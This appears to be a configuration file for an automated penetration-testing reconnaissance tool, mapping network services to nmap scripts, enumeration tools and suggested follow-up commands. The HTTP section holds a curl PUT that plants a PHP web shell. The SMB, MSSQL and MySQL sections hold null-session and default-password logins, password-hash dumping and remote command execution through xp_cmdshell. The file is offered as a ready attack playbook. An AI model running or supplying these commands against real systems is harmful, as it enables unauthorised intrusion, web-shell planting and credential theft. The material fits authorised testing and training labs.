# see: https://packetstormsecurity.com/files/18307/nmap-services.html
# TODO: msrdp/ms-wbt-server, ipp, java-rmi, vnc/vnc-http, oracle-tns,
#       kerberos-sec, imap/imap3/imaps, https, ssl/http, ssl/http-alt
# Commands accept arguments: <port>/<ports>, <target>, <fout>,
#                            <wordlist>, <userlist>, <passlist>
# If <port> is used instead of <ports>, then a separate entry for each
# matching applicable port will be generated for scans/recommendations;
# otherwise, <ports> will join all applicable ports with ',' and pass the
# build string as "one" argument.

[ftp]  # 20, 21
  nmap-service-names = [
    "ftp",
    "ftp-data"
  ]

  recommendations = [
    # none
  ]

  [ftp.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <target> -oN <fout>"


[ssh]  # 22
  nmap-service-names = [
    "ssh"
  ]

  recommendations = [
    # none
  ]

  [ssh.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target> -oN <fout>"


[telnet]  # 23
  nmap-service-names = [
    "telnet"
  ]

  recommendations = [
    "telnet <target> <port>"
  ]

  [telnet.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=telnet-encryption,telnet-ntlm-info <target> -oN <fout>"


[smtp]  # 25
  nmap-service-names = [
    "smtp"
  ]

  recommendations = [
    "telnet <target> <port>"
  ]

  [smtp.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=smtp-ntlm-info,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 <target> -oN <fout>"
    smtpuserenum = "smtp-user-enum -M VRFY -U <userlist> -t <target> 2>&1 | tee <fout>"


[dns]  # 53
  nmap-service-names = [
    "domain"
  ]

  recommendations = [
    "nslookup"
  ]

  [dns.scans]
    dnsrecon = "dnsrecon -t axfr <target> 2>&1 | tee <fout>"
    host = "host -t ns <target> 2>&1 | tee <fout>"
    nmap = "nmap -v -Pn -p <ports> --script=dns-service-discovery,dns-cache-snoop,dns-check-zone,dns-zone-transfer <target> -oN <fout>"


[http]  # 80, 591
  nmap-service-names = [
    "http",
    "http-alt"
  ]

  recommendations = [
    "curl -v -X OPTIONS http://<target>:<port>/<directory>",
    "curl -v -X PUT -d '<?php echo shell_exec($_GET[\"cmd\"]);?>' http://<target>:<port>/<directory>/webshell.php",
    "dirb http://<target>:<port>/",
    "dotdotpwn -m http -h <target> -x <port> -f <pathtoretrieve> -k <keywordthatmustbepresent> -d <depth> -t <millisperrequest> -s",
    "wafw00f http://<target>:/<port>/",
    "nmap -Pn -p <ports> --script http-adobe-coldfusion-apsa1301,http-coldfusion-subzero,http-vuln-cve2009-3960,http-vuln-cve2010-2861 <target> -oN <fout>",
    "wpscan --url http://<target>:<port>/"
  ]

  [http.scans]
    nikto = "nikto -host <target> -port <ports> 2>&1 | tee <fout>"
    nmap = "nmap -vv -Pn -p <ports> --script=http-vuln* <target> -oN <fout>"
    gobuster = "gobuster -e -w <wordlist> -u http://<target>:<port>/ 2>&1 | tee <fout>"


[pop3]  # 110
  nmap-service-names = [
    "pop3"
  ]

  recommendations = [
    # TODO
  ]

  [pop3.scans]
    # TODO


[smb]  # 139, 445
  nmap-service-names = [
    "microsoft-ds",
    "netbios-ssn"
  ]

  recommendations = [
    "nmap -vv -sU --script=nbstat -p <ports> <target>",
    "crackmapexec smb <target> -u <user> -p <pass> --spider C\\$ --pattern <pattern>",
    "crackmapexec smb <target> -u '' -p ''",
    "crackmapexec smb <target> -u '' -p '' --local-auth",
    "smbclient -L <target>",
    "smbclient \\\\<target>\\<share>"
  ]

  [smb.scans]
    "nmap.tcp" = "nmap -vv -Pn -p <ports> --script smb-vuln* <target> -oN <fout>"
    enum4linux = "enum4linux -a <target> 2>&1 | tee <fout>"


[msrpc]
  nmap-service-names = [
    "epmap",
    "msrpc",
    "rpcbind",
    "sunrpc",
    "erpc"
  ]

  recommendations = [
    "rpcclient -U '' <target>",
    "rpcinfo -p <target>",
    "showmount -e <target>"
  ]

  [msrpc.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=msrpc-enum <target> -oN <fout>"


[snmp]  # 161
  nmap-service-names = [
    "snmp"
  ]

  recommendations = [
    # none
  ]

  [snmp.scans]
    nmap = "nmap -vv -Pn -p <ports> --script=snmp-netstat,snmp-processes <target> -oN <fout>"
    onesixtyone = "onesixtyone <target> 2>&1 | tee <fout>"
    snmpwalk = "snmpwalk -c public -v1 <target> 2>&1 | tee <fout>"


[ldap]
  nmap-service-names = [
    "ldap"
  ]

  recommendations = [
    # none
  ]

  [ldap.scans]
    enum4linux = "enum4linux -l <target> 2>&1 | tee <fout>"


[mssql]  # 1433, 1434
  nmap-service-names = [
    "ms-sql",
    "ms-sql-s"
  ]

  recommendations = [
    "nmap -vv -Pn -p <port> --script=ms-sql-dump-hashes --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>' <target>",
    "nmap -vv -Pn -p <port> --script ms-sql-xp-cmdshell --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>,ms-sql-xp-cmdshell.cmd=\"<cmd>\"' <target>",
    "sqsh -S <target>:<port> -U <user>"
  ]

  [mssql.scans]
    # none


[mysql]  # 3306
  nmap-service-names = [
    "mysql"
  ]

  recommendations = [
    "mysql -u root -proot <target>"
  ]

  [mysql.scans]
    nmap = "nmap -vv -Pn --script=mysql-variables,mysql-vuln-cve2012-2122,mysql-info,mysql-users,mysql-enum,mysql-databases,mysql-dump-hashes <target> -oN <fout>"
